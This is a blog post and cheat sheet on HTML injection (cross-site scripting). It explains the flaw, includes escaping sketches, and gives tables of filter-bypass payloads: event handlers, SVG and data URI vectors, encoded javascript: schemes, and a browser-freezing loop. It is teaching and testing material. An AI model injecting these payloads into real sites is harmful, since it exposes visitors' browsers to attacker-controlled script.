Friends, Romans, visitors, lend me your eyes. I’ve added an HTML injection quick reference (HIQR) to the site. It’s not in iambic pentameter, but there’s a certain rhythm to the placement of quotation marks, less-than signs, and alert() functions.
For those unfamiliar with HTML injection (or cross-site scripting in the vulgate), it’s a vulnerability that enables an attacker to modify a page in order to affect the behavior of a victim’s browser. As the name suggests, the attacker injects markup or JavaScript, usually via a form field or querystring parameter, into a string that is then re-displayed by the app. In the worst cases, the app delivers malicious content to anyone who visits the infected page. Insecure string concatenation is the most common programming error that leads to this flaw.
Imagine an app that permits users to write img tags in posts to show off cute pictures of spiders. The app expects users to add images with src attributes that point anywhere on the web. For example,
<img src="http://web.site/image.png">
Were users of the app to limit themselves to nicely formed http: or https: schemes, all would be well in the world. However, there’s already trouble brewing in the form of javascript: schemes. For example, a malicious user could inject arbitrary JavaScript into the page — a dangerous situation considering the JavaScript will be executing within the Same Origin Policy of the web app.
<img src="javascript:alert(9)">
Then there’s the trouble with attributes. Even if the site restricted schemes to http: or https:, a (not-at-all) devious hacker could add an inline event handler, for example,
<img src="http://&" onerror=alert(9)>
Now the attacker has two ways of executing JavaScript in their victim’s browsers — javascript: schemes and event handlers.
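To make the limits of scheme checking concrete, here is a minimal sketch. The function names (hasAllowedScheme, renderImg) and the sample payloads are illustrative assumptions, not code from any real app. It shows a filter that accepts only http: and https: values and still lets an event handler through once the value is concatenated into the tag.

```javascript
// Hypothetical filter: accept only values that start with http: or https:.
function hasAllowedScheme(src) {
  return /^https?:/i.test(src);
}

// Hypothetical renderer that concatenates the value into markup, unescaped.
function renderImg(src) {
  return '<img src="' + src + '">';
}

const schemePayload = 'javascript:alert(9)';
const handlerPayload = 'http://&" onerror="alert(9)';

console.log(hasAllowedScheme(schemePayload));  // false: the scheme check rejects it
console.log(hasAllowedScheme(handlerPayload)); // true: the scheme looks fine
console.log(renderImg(handlerPayload));
// <img src="http://&" onerror="alert(9)">
```

The scheme check is doing its job here; the problem is that it inspects only the start of the value, while the quotation mark later in the value ends the attribute.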
There’s more. Suppose the app writes anything the user submits into the web page. We’ll even imagine that the app’s developers have decided to enforce an http: or https: scheme and they only allow visitors to define a src value. In order to be more secure, the web app writes the src value into an element that’s guaranteed to not have any event handlers. This is where string concatenation rears its ugly, insecure head. For example, the hacker submits the following src attribute:
http:"><script>alert(9)</script>
The app pops this value into the src attribute and, presto!, a new element appears. Notice the two characters at the end of the line, ">. They were the intended end of the src attribute and tag, which the hacker’s payload subverted:
<img src="http:"><script>alert(9)</script>">
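The concatenation flaw and one common countermeasure can be sketched as follows. This is an illustration under stated assumptions: renderImgUnsafe, escapeAttribute, and renderImgEscaped are hypothetical names, the payload injects a script element, and a real app would normally rely on the escaping routines of its template framework rather than a hand-rolled one.

```javascript
// Unsafe: the submitted value is concatenated straight into the markup.
function renderImgUnsafe(src) {
  return '<img src="' + src + '">';
}

// Escape the characters that can end an attribute value or start a tag.
function escapeAttribute(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Same concatenation, but the value is escaped first.
function renderImgEscaped(src) {
  return '<img src="' + escapeAttribute(src) + '">';
}

const breakoutPayload = 'http:"><script>alert(9)</script>';

console.log(renderImgUnsafe(breakoutPayload));
// <img src="http:"><script>alert(9)</script>">
console.log(renderImgEscaped(breakoutPayload));
// <img src="http:&quot;&gt;&lt;script&gt;alert(9)&lt;/script&gt;">
```

Escaping keeps the payload inside the attribute value, so the browser treats it as a (broken) image URL instead of new markup. The ampersand is replaced first so that the entities produced by the later replacements are not escaped twice.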
HTML injection attacks become increasingly complex depending on the context where the payload is rendered, the characters that are stripped or escaped by data validation filters, the patterns used to detect malicious payloads, and the encoding of the payloads and the page. Check out chapter 2 of HWA for more background on these situations.
You’ll find more info on this blog in articles with an “html injection” category or tag.
SPQR (Senātus Populusque Rōmānus) was the Latin abbreviation used to refer to the collective citizens of the Roman empire. Read up on HTML injection and you’ll become SPQH (Senātus Populusque Haxxor) soon enough.
Mike Shema, Deadliest Web Attacks. The latest revision is at https://mutantzombie.github.io/HIQR/hiqr.html
Table 1: Injection Techniques for Various Parsing Contexts
Table 2: Payload Crafting Techniques to Bypass Filters and Data Validation
Table 3: JavaScript Compositions for Manipulation & Obfuscation
| Context | State | Injection Example |
|---|---|---|
| Data State (Text node, open tag) | | Welcome back, <script>☣</script>... |
| | </element> | <title>Search Results for '</title>☣' |
| | --> | <!-- lorem ipsum--><script>☣</script>--> |
| | ]]> | <FOO><![CDATA[]]><script>☣</script>]]> |
| Attribute value | Unquoted, Single-quoted | |
| JavaScript variable assignment | Unquoted, Single-quoted | (blog post) |
| JavaScript Window.location object property (.hash, .href, .pathname, .search) | URL | |
1 The biohazard symbol (U+2623) – ☣ – in each example represents a JavaScript payload. It could be anything from a while loop to DoS the browser, e.g. var a;while(1){a+="a"}, to the ubiquitous alert(9). These categories focus on the placement of the payload within the rendered document rather than the effect of the payload.
Though it seems daunting to review the HTML5 syntax specification, doing so aids in understanding how HTML is supposed to be formed. HTML5 defines an explicit algorithm for parsing HTML documents. Read through the spec to become familiar with the expectations of Unicode code points, parse errors, and decisions a User Agent may make when dealing with markup. A standardized approach to parsing is supposed to minimize the quirks and differences among browsers, thus removing a historical source of insecurity. The HTML4 spec was not as clear or as rigorous on parsing.
2 Sometimes it’s helpful to insert a space before the --> to ensure the tag is interpreted. [ HTML5 comments ]
3 This is a quirk of jQuery’s design choice for overloading the $() API to accept selectors or elements. Read about the interplay of JavaScript and Content Security Policy on the blog.
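For the JavaScript variable assignment context in Table 1, a minimal sketch of the single-quoted case may help. The function names and the payload are hypothetical, chosen only for illustration; the "safer" variant is one possible approach, not a complete defense for every script context.

```javascript
// Hypothetical server-side template: writes user input into a
// single-quoted JavaScript string inside a script block.
function renderSearchScriptUnsafe(term) {
  return "<script>var q = '" + term + "';</script>";
}

// One safer option: serialize the value as a JSON string literal and
// escape "<" so the value cannot close the surrounding script element.
function renderSearchScriptSafer(term) {
  const literal = JSON.stringify(String(term)).replace(/</g, '\\u003c');
  return '<script>var q = ' + literal + ';</script>';
}

const quoteBreakout = "';alert(9);//";

console.log(renderSearchScriptUnsafe(quoteBreakout));
// <script>var q = '';alert(9);//';</script>
console.log(renderSearchScriptSafer(quoteBreakout));
// <script>var q = "';alert(9);//";</script>
```

In the unsafe output the payload's leading quote ends the string, alert(9) runs as a statement, and the trailing // comments out the leftover quote.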
| Concept | Notes | Payload Example |
|---|---|---|
| Alternate attribute delimiters | Forward slash | <img/src=""onerror=alert(9)> |
| | Dangling quoted string | <a'' href'' onclick=alert(9)>foo</a> |
| | | <a"" href=""onclick=alert(9)>foo</a> |
| | CRLF instead of space | <img%0d%0asrc=""%0d%0aonerror=alert(9)> |
| HTML entity encoding | JavaScript scheme (decimal, hex, Unicode) | <a href="javascript:alert(9)">foo</a> |
| | | <a href="javascript:alert(9)">foo</a> |
| | | <a href="javascript:alert(9)">foo</a> |
| JavaScript inline event handlers (HTML4 or HTML5) | Unquoted | <input type=text name=foo value=a%20onchange=alert(9)> |
| | Double-quoted | <input type="text" name="foo" value=""onmouseover=alert(9)//"> |
| | Single-quoted | <input type='text' name='foo' value=''onclick=alert(9)//'> |
| | HTML5 autofocus | <input type="text" name="foo" value=""autofocus/onfocus=alert(9)//"> |
| Data URI handlers | src & href attributes; Base64 data; Alternate | |
| Alternate markup | SVG | <svg onload="javascript:alert(9)" xmlns="http://www.w3.org/2000/svg"></svg> |
| | | <svg xmlns="http://www.w3.org/2000/svg"> <g onload="javascript:alert(9)"></g></svg> |
| | | <svg><script xlink:href=data:,alert(9)></script> |
| | | <svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(9)"> <rect width="1000" height="1000" fill="white"/></a></svg> |
| Untidy markup | Missing greater-than sign; Recover from syntax error; Uncommon syntax; Orphan entity; Vestigial attribute | |
| Anti-regex patterns | Element closed prematurely; Element confusion; Quote confusion; Quote confusion with element; Quote mixing with element; Recursive elements; Repeated attributes (match last occurrence) | |
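The HTML entity encoding row depends on the browser decoding character references in an attribute value before it interprets the URL scheme, so a filter that looks for the literal text javascript: in the raw markup can miss an encoded form. A rough sketch, assuming a hypothetical decodeNumericReferences helper that handles only decimal and hexadecimal numeric references (a real HTML parser also handles named references and many edge cases), with encoded samples chosen for illustration:

```javascript
// Decode decimal (&#106;) and hexadecimal (&#x6a;) character references.
// Illustrative only: named references and parser edge cases are ignored.
function decodeNumericReferences(text) {
  return text.replace(/&#(x[0-9a-f]+|[0-9]+);/gi, (match, body) => {
    const isHex = body[0] === 'x' || body[0] === 'X';
    const codePoint = parseInt(isHex ? body.slice(1) : body, isHex ? 16 : 10);
    return String.fromCodePoint(codePoint);
  });
}

const decimalForm = '&#106;avascript:alert(9)';
const hexForm = '&#x6a;avascript:alert(9)';

// A naive filter on the raw value sees no "javascript:" prefix...
console.log(/^javascript:/i.test(decimalForm)); // false
// ...but both forms decode to the same scheme.
console.log(decodeNumericReferences(decimalForm)); // javascript:alert(9)
console.log(decodeNumericReferences(hexForm));     // javascript:alert(9)
```

The practical consequence is that validation needs to run on the decoded value, or better, on the output of a real parser.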
1 HTML5’s Content Security Policy headers can neutralize these attacks by preventing the User Agent from executing inline JavaScript within this context, unless the page author has been forced to allow it by including the "unsafe-inline" keyword in the policy.
2 The basic format is dataurl := "data:" [ mediatype ] [ ";base64" ] "," data. The scheme is defined in RFC 2397.
3 Per HTML5 spec, “When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).”
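The data URL grammar in footnote 2 can be exercised with a short sketch. It assumes Node.js (for Buffer); the helper name makeDataUrl and the sample payloads are illustrative rather than taken from the tables.

```javascript
// Build a data: URL following
//   dataurl := "data:" [ mediatype ] [ ";base64" ] "," data
function makeDataUrl(data, mediatype = '', useBase64 = false) {
  const body = useBase64
    ? Buffer.from(data, 'utf8').toString('base64')
    : encodeURIComponent(data);
  return 'data:' + mediatype + (useBase64 ? ';base64' : '') + ',' + body;
}

// Both optional parts omitted.
const plainUrl = makeDataUrl('alert(9)');
// Media type and base64 flag present.
const base64Url = makeDataUrl('<script>alert(9)</script>', 'text/html', true);

console.log(plainUrl); // data:,alert(9)
console.log(base64Url.startsWith('data:text/html;base64,')); // true

// Decoding the base64 body recovers the original markup.
const decodedBody = Buffer.from(base64Url.split(',')[1], 'base64').toString('utf8');
console.log(decodedBody); // <script>alert(9)</script>
```

The base64 form matters for filter evasion because the encoded body contains none of the characters or keywords that a pattern-based filter would look for.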
| Technique | Notes | Example |
|---|---|---|
| Concatenation | String operators; Logical operators; Mathematical operators | |
| Function execution | Anonymous; Method lookup | |
| Strings | String object; Regex object source attribute | |
| Harness function from a JavaScript library | Angular; Ember JS; jQuery; Prototype; Underscore | |
| Type coercion | | |
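A few of the Table 3 techniques can be sketched in plain JavaScript. The snippets below are illustrative assumptions, not the reference's own examples. A stand-in object named fakeWindow replaces the browser's window so the sketch runs outside a browser and records calls instead of opening a dialog.

```javascript
// Stand-in for window in a browser; records calls instead of showing a dialog.
const calls = [];
const fakeWindow = { alert: (value) => calls.push(value) };

// Concatenation: build the name "alert" without writing it literally.
const viaStrings = 'al' + 'ert';
// Strings: a regex literal's source property, and String.fromCharCode.
const viaRegex = /alert/.source;
const viaCharCodes = String.fromCharCode(97, 108, 101, 114, 116);

// Function execution: method lookup by computed name, and an anonymous function.
fakeWindow[viaStrings](9);
fakeWindow[viaRegex](9);
(function () { fakeWindow[viaCharCodes](9); })();

// Type coercion: operators turn arrays and booleans into strings and numbers.
const emptyString = [] + [];   // ""
const zero = +[];              // 0
const falseString = ![] + [];  // "false"

console.log(calls); // [ 9, 9, 9 ]
console.log(emptyString === '', zero === 0, falseString === 'false'); // true true true
```

Each composition avoids the literal token a filter is likely to match, which is why filters that search for strings such as alert( tend to be easy to bypass.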